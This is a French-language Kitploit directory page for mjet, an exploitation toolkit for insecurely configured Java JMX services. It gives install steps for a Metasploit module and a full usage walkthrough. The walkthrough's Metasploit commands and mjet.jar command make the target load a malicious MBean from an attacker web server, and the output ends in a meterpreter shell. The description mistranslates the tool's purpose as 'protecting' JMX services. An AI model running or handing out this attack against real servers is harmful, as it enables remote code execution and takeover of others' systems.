Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
mjet — Mogwai Boîte à outils d'exploitation Java Management Extensions (JMX) | Kitploit
Outils/GitHubGitHub/mogwaisec/mjet
Frameworks d'ExploitationGénération de PayloadsExploitationTests d'IntrusionMauvaise ConfigurationRed Teaming
GitHubmogwaisec/mjet

mjet

Mogwai Boîte à outils d'exploitation Java Management Extensions (JMX)

Voir le dépôt
17431il y a 10 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

mjet

Kit d'exploitation Java Management Extensions (JMX) de Mogwai Security

mjet est un outil qui peut être utilisé pour protéger les services JMX configurés de manière non sécurisée. Il est basé sur l'article de blog "Exploiting JMX-RMI" de Braden Thomas/Accuvant "http://www.accuvant.com/blog/exploiting-jmx-rmi" et peut être utilisé pour exécuter des charges utiles Metasploit arbitraires sur le système cible.

Mjet était initialement prévu pour être un kit d'attaque complet, mais nous avons remarqué que le dépôt GitHub de Metasploit contient une pull request qui fournira un support de base Java RMI/sérialisation en ruby natif. C'est génial et cela supprime la dépendance à Java. Nous avons donc arrêté de développer cet outil et créerons des modules Metasploit dans un avenir proche.

mjet se compose des parties suivantes :

  • Un module Metasploit qui émule un "mlet Server". Il s'agit essentiellement d'un serveur web qui héberge un fichier html contenant une balise mlet
  • Un ManagedBean qui est modifié par le module du serveur mlet pour inclure la charge utile sélectionnée
  • Une archive jar utilisée pour contacter le service JMX non sécurisé.

Installation (avec la version GitHub de Metasploit)

  • Copiez le dossier "MBean" dans "data/java/metasploit"
  • Copiez java_mlet_server.rb dans "modules/exploits/multi/misc/"

Utilisation

L'exemple utilise les systèmes suivants : attaquant: 192.168.178.1 cible: 192.168.178.200, service JMX exécuté sur le port TCP 1616

  • Configurez/démarrez le module Metasploit "java_mlet_server". Le module s'exécutera en tâche de fond
root@kitploit:~
msf > use exploit/multi/misc/java_mlet_server
msf > set LHOST 192.168.178.1
msf > set SRVHOST 192.168.178.1
msf > set URIPATH /mlet/
msf > run

Utilisez mjet.jar pour vous connecter au service JMX vulnérable et fournir l'URL au serveur web MLet...

root@kitploit:~
java -jar mjet.jar -t 192.168.178.200 -p 1616 -u http://192.168.178.1:8080/mlet/
---------------------------------------------------
MJET - Mogwai Security JMX Exploitation Toolkit 0.1
---------------------------------------------------

[+] Connecting to JMX URL: service:jmx:rmi:///jndi/rmi://192.168.178.200:1616/jmxrmi ...
[+] Connected: rmi://192.168.178.164  5
[+] Trying to create MLet bean...
[+] Loaded javax.management.loading.MLet
[+] Loading malicious MBean from http://192.168.178.1:8080/mlet/
[+] Invoking: javax.management.loading.MLet.getMBeansFromURL
[+] Loaded class: metasploit.Metasploit
[+] Loaded MBean Server ID: ptIIirfM:name=BlPwaoHu,id=oWTqfkbE
[+] Invoking: metasploit.Metasploit.run()
[+] Done

Et profitez de votre shell meterpreter :-)

Télécharger l’outil